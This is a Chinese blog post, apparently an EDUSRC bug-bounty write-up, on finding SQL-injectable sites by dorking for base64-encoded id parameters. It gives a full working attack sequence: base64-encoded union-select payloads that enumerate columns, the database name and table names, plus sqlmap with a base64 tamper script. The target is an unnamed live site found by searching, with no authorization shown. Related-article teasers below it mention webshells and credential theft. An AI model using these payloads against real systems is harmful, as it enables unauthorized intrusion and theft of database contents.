EDUSRC-记一次登录过程中的信息泄露

最新推荐文章于 2024-02-01 14:57:41 发布
最新推荐文章于 2024-02-01 14:57:41 发布
阅读量92 收藏 1
点赞数
分类专栏: 技术干货 内网渗透 文章标签: web安全 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/134119654
版权

目录

一、资产搜集

二、开始sql注入常规流程

三、sqlmap验证

总结:测试sql注入的时候不要只局限于明文传输,也要注意编码或者加密后的值。

一、资产搜集

我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索inurl:.php?id=MQ==,或者搜索1的md5加密值,即可以搜索inrul:.php?id=a0b923820dcc509a。这样子搜索完,我们可测试的范围就扩大了。此处我就是利用inurl:.php?id=MQ==搜索到了一处存在sql注入的网站。

图片

二、开始sql注入常规流程

(1)判断字符型还是数字型

 

  1.  
    ?id=MQ== (原始值为1)
     
  2.  
    ?id=MeKAmQ== (原始值为1')
     
 

 

图片
 


  
 

图片
 


 从这两者的反应可以判断出是数字型。
 (2)判断是否存在sql注入漏洞
 

 

  1.  
    ?id=MSBhbmQgMT0x (原始值1 and 1=1) 有内容
     
  2.  
    ?id=MSBhbmQgMT0y (原始值1 and 1=2) 没有内容,页面下方空白
     
 

 

图片
 


  
 

图片
 


 可以判断出此处可能存在sql注入。
 (3)判断列数
 

 

  1.  
    ?id=MSBvcmRlciBieSAz (原始值1 order by 3) 页面内容正常输出
     
  2.  
    ?id=MSBvcmRlciBieSA0 (原始值1 order by 4) 报错
     
 

 

图片
 


  
 

图片
 


 可以判断列数为3。
 (4)判断显错位。
 

 

  1.  
    ?id=LTEgdW5pb24gc2VsZWN0IDEsMiwz (原始值-1 union select 1,2,3)
     
 

 

图片
 


 显错位为2和3。
 (5)在显错位2的位置上尝试获取当前数据库
 

 

  1.  
    ?id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwz (原始值-1 union select 1,database(),3)
     
 

 

图片
 


 (6)获取当前数据库中的表
 

 

  1.  
    id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgp
     
  2.  
     
  3.  
    原始值:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
     
 

 

图片
 


 (7)接下来就是获取其中某一个表的字段名和字段值了,只需将相应的SQL语句进行BASE64编码,然后输入即可。
  
 

图片
 

三、sqlmap验证
 

由于传参是需要进行base64编码的,所以此处我们在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上--tamper base64encode.py即可。
  
 

图片
 


  
 

图片
 


  
 

图片
 

 

图片
 

总结:测试sql注入的时候不要只局限于明文传输,也要注意编码或者加密后的值。
 

                
 

           还没看够?欢迎关注,带你走进黑客世界,下面也有免费的靶场视频
 

 

免费领取安全学习资料包!一起学习,共同进步icon-default.png?t=N7T8https://docs.qq.com/doc/DRGJHbUxpTWR2Y3lq
 


                

        

        

    




    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Edusrc漏洞挖掘 | Sql注入九连杀(一)

				
			

			

				

					weixin_66717977的博客
				

				

					03-13
					
					450
					
				

			

		

		

			
				
一次edusrc漏洞挖掘的sql注入九连杀的第一章

			
		

	



                

              
                



	

		

			

				
					
edusrc通杀漏洞笔(注入篇)

				
			

			

				

					qq_51542789的博客
				

				

					12-14
					
					570
					
				

			

		

		

			
				
SQL注入是很常见的漏洞了,网上文章也特别多,各位看官自行百度(人比较懒),属实废话了,本人文采也不是特别好,所以该文章截图会比较多,不喜勿喷。还有,这是SRC挖掘,所以都是点到为止,不过有师傅说菜我也照单全收,因为我是要成为xx康第一打螺丝手的存在,废话不多说,开始正文。

			
		

	



                


  
              

                


	

		

			

				
					
一次挖edusrc漏洞挖掘(sql注入)

				
			

			

				

					Lulzcart的博客
				

				

					01-22
					
					1844
					
				

			

		

		

			
				
一次挖edusrc漏洞挖掘(sql注入)

			
		

	





	

		

			

				
					
edu-SQL注入案例分享

				
			

			

				

					weixin_52501704的博客
				

				

					07-22
					
					311
					
				

			

		

		

			
				
上述sql注入均为小程序出现的漏洞。小程序在不反编译代码的情况下,一般测试如下:点击所有功能,逐个分析每个数据包,极大概率存在敏感信息泄露和未授权的接口。对参数进行挨个测试,在用户名,id,分页功能处均可能存在SQL注入,且尽量使用手工,sqlmap说不定会让你错过很多注入的洞,有十足把握或者无WAF再尝试sqlmap。文件上传大多为静态目录,可能存在极少数会上传后端拿到shell。平行越权大概率有SQL注入。

			
		

	



		

			
		



	

		

			

				
					
实战SRC | 某站点后台管理系统SQL注入

				
			

			

				

					zkaqlaoniao的博客
				

				

					01-03
					
					396
					
				

			

		

		

			
				
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点。直接去百度一手,发现有个SQL注入还有其他的漏洞,打算一个一个尝试看看。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨守法.申明:本文所分享内容仅用于网络安全技术讨论,切勿用于违法途径,本文由掌控安全学院 - 会唱会跳会敲键盘 投稿。OK,成功爆破出数据库名,SQL注入一枚到手~网站后台很像cms搭建的,在查看网站时发现。典型的狮子鱼cms的特征!

			
		

	





	

		

			

				
					
edusrc-web:edusrc用户主页数据分析与查询

				
			

			

				

					03-15
				

			

		

		

			
				
edusrc网站 edusrc用户主页在线数据分析与查询

			
		

	





	

		

			

				
					
一个登录点两个逻辑漏洞-edusrc.doc

				
			

			

				

					07-08
				

			

		

		

			
				
一个登录点两个逻辑漏洞-edusrc.doc

			
		

	





	

		

			

				
					
[信息收集]-(红队).pdf

				
			

			

				

					05-30
				

			

		

		

			
				
很全,包括企业src和edusrc等等

			
		

	





	

		

			

				
					
edusrc各路大佬的文章

				
			

			

				

					08-18
				

			

		

		

			
				
各种论坛和公众号关于edusrc的文章

			
		

	





	

		

			

				
					
edusrc技巧.docx

					
最新发布

				
			

			

				

					04-08
				

			

		

		

			
				
edusrc技巧

			
		

	





	

		

			

				
					
eduSRC那些事儿-2(sql注入类+文件上传类)

				
			

			

				

					m0_74360619的博客
				

				

					02-01
					
					367
					
				

			

		

		

			
				
并且在桌面找到缴费系统的内网IP,尝试使用Mimikatz获取的密码进行登录,成功登录。文件检测过滤了脚本格式后缀也不存在解析漏洞,而在服务器上传时取的是第一个点的后缀,所以成功上传了php文件。发现成功上传了脚本文件,连接webshell,在利用fofa查找C段资产时,发现目标存在某登录系统,直接使用admin/123456弱口令进后台管理系统,在相关功能点存在文件上传,没有任何过滤,然后上传了一个aspx大马(有通过注册表查看rdp端口的功能),发现管理员把3389端口改成了1111,连接即可登录

			
		

	





	

		

			

				
					
录一次挖取学校edusrc——SQL注入

				
			

			

				

					CC__Faker的博客
				

				

					06-07
					
					5020
					
				

			

		

		

			
				
前言

这次漏洞发现其实并不是刻意去扫描挖掘的,当时是百度搜了下学校站点,查到本校的继续教育学院,里面有个录取结果查询模块。随手测了几句sql发现竟然报错了,于是开始对漏洞危害的验证。

0x00 测试工具
burpsuite
sqlmap
0x01注点判断
常规and 1=1 ,1=2试试,网页正常反馈。

尝试让页面报错。

没想到出现了回显信息,回显信息还打印了sql语句,网站目录等信息。
1)SQL语句为”SELECT * FROM baoming_list WHERE shenfenzhengh

			
		

	





	

		

			

				
					
Web渗透测试之SRC挖掘经验分享

				
			

			

				

					03-30
				

			

		

		

			
				
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应心漏洞,凭借挖漏洞月收入过万

			
		

	





	

		

			

				
					
一次edu,SQL注入实战

				
			

			

				

					m0_65247093的博客
				

				

					05-05
					
					1191
					
				

			

		

		

			
				
目录



0x01 思路:inurl:exam result

0x02 判断注入

0x03 报错注入

0x04 sqlmap



0x01 思路:inurl:exam result

(存在漏洞的可能性比较大)

探针用rad爬虫+jsfinder爬取到查询接口post

这种功能都有sql select语句(如果过滤不严谨存在注入可能性就比较大)



js前端:身份证号又前端校检18位 绕过才能够抓包







0x02 判断注入

正常发包



单引号报synax语法错误




..

			
		

	





	

		

			

				
					
sql注入绕过与sqlmap绕过使用总结

				
			

			

				

					jklbnm12的博客
				

				

					08-12
					
					874
					
				

			

		

		

			
				
前言
最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。

可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位师傅在实战遇到waf可以看一看,能给各位师傅一点帮助,所以就想着写一篇。
还有一个很有可能是有注入点的但是,用了很多注入语句都不行,不知道怎么回事

后面再去慢慢研究。
正文
手动绕过
一:空格被过滤
当空被过滤掉的时候(也就是被删掉的意思)问你就可以使用编码或者注释进行绕过
%20,%09,/**/ &n

			
		

	





	

		

			

				
					
挖洞思路 | 通过Splunk对“EDU SRC”的公开情报信息进行数据分析

				
			

			

				

					.
				

				

					08-14
					
					1029
					
				

			

		

		

			
				
在挖SRC的过程,“挑软柿子捏”已经算是一种常规思路。而对于刚开始挖SRC的小伙伴来说,「挑选目标」以及「挖掘漏洞的方向」似乎是一件比较让人纠结的事情。

所以,我们就在思考能否通过爬虫脚本抓取「教育行业漏洞报告平台」上的公开数据做分析,再根据各大院校漏洞公布情况输出「情报数据」,为我们在「挑选目标」以及「挖掘漏洞的方向」上提供一些「情报信息」作为参考。



「教育行业漏洞报告平台」现有的公开情报信息:

漏洞列表:时间、漏洞标题、等级、漏洞上报人员
	全国高校漏洞排行榜:排名、单位、漏洞总数、漏...

			
		

	





	

		

			

				
					
一次EDU高校弱口令+POST注入+水平越权组合拳挖掘

				
			

			

				

					Adminxe的博客
				

				

					05-05
					
					2708
					
				

			

		

		

			
				
0X00. 前言

隔壁的表哥一直吵着说,想让我帮我测试一下他们学校的XX管理系统和OA系统有没有漏洞,那么也不能推辞,就帮忙看看吧(说实话,近期肺炎闹得太热闹,在村里也不能出去玩,出家门都不可以,于是XE就过来水文章了)。 当然我这个弟弟( Adminxe )也是挖过一个月edusrc的,并且取得了前30的名次,证书拿了20多张,确实感觉没什么意思,发个说说还被喷娱乐圈,难受呀! 还是好好水...

			
		

	





	

		

			

				
					
edusrc挖掘思路

					
热门推荐

				
			

			

				

					qq_45414878的博客
				

				

					05-09
					
					2万+
					
				

			

		

		

			
				
edusrc挖掘思路前言思路信息搜集系统账号常见漏洞实战分享1、确定目标,语法:site:xxxx.edu.cn2、账号密码组成我们知道了,谷歌语法查找工号3、爆破登录系统4、确定功能,抓具体的url5、添加单引号,报错,是mssql6、报数据库版本,到这一步就可以交了,已经是危了后
前言
一月份的时候偶然注意到edusrc,起初是抱着学习的心态去挖几个洞,可是后面发现有证书,而且还贼好看,于是我动了凡心,一顿操作也拿了几本,广西民大、山东理工、同济,未到的有浙大、上海理工,证书要求证书图片可以在我个人

			
		

	





	

		

			

				
					
教育edusrc一个洞是多少积分

				
			

			

				

					12-13
				

			

		

		

			
				
教育资源网(edusrc)的积分系统是根据用户在网站上的活跃度和贡献度来评定的,用于激励用户分享教育资源、参与讨论和互动。因此,无法简单地给出一个固定的积分数量作为准确答案。  edusrc的积分系统通常根据以下几...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值